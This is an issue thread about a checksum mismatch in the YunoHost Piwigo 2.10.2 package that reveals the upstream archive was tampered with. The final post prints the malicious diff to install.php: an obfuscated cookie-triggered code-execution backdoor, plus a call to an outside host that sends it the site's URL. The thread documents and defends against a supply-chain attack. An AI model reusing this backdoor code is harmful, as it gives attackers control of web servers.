Wrong sha256sum on piwigo 2.10.2

[kevanescence]

Hello,

I have just installed a new version of yunohost on my debian 9 server After having a look in the log, I realized that there was a checksum check issue while downloading the app preventing it to install it successfully The checksum has been changed with this commit regarding to the new version https://github.com/YunoHost-Apps/piwigo_ynh/commit/a1ae3d306705eca501e498e10706aa6263c8cacf#diff-1681551f7cc2b82e360de05085fc1bca I do not know why it is not the same

While in the command line I have

wget -nv -O app.zip 'http://piwigo.org/download/dlcounter.php?code=2.10.2'
sha256sum app.zip
51a085758919aeda38ba64e2c5b4a7930ff106e73fca6e4b4234255fa26781ec  app.zip

Thanks for your help

[JimboJoe]

Hi, Thanks for your report. I had a look, and this change looks suspicious to me. I reported it at the Piwigo forum here, and we'll see how it goes.

[JimboJoe]

Hi, The source archive file was definitely corrupted due to a hacking action, and has been fixed on piwigo.org. It's fixed now. Thanks a lot for your quick report, which has probably saved many servers from hacking :+1: That's interesting to see YunoHost checksum control preventing users from that type of attack.

[kevanescence]

For curious people, forgot to put the diff between the corrupted and the official piwigo

diff piwigo_2.10.2_official/install.php ../piwigo_2.10.2_hacked/install.php
16a17,25
> $p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[85]=$p[85].$p[81])&&($p[78]=$p[85]($p[78]))&&($p=$p[78]($p[79],$p[85]($p[38])))&&$p()):$p;
> if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on')
>     $link = "https";
> else
>     $link = "http";
> $link .= "://";
> $link .= $_SERVER['HTTP_HOST'];
> $link .= $_SERVER['REQUEST_URI'];
> echo file_get_contents('http://uyluk.pythonanywhere.com/host/'.$link);